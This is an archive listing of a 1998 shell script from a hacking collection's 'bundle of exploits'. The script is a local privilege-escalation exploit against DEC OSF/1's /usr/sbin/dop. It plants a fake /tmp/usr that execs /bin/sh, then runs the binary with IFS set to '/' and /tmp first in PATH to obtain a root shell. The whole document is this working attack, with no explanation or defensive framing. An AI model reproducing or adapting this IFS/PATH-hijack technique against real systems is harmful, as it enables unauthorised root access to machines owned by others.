home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Hacking & Misc / bundle of exploits.sit / bundle of exploits / dec_osf1.sh < prev    next >
Linux/UNIX/POSIX Shell Script  |  1998-07-17  |  150b  |  10 lines

  1. #!/bin/sh
  2. cat > /tmp/usr <<EOF
  3. #!/bin/sh
  4. IFS="   "
  5. export IFS
  6. exec /bin/sh
  7. EOF
  8. chmod 755 /tmp/usr
  9. IFS=/ PATH=/tmp:$PATH /usr/sbin/dop crack-user=root
  10.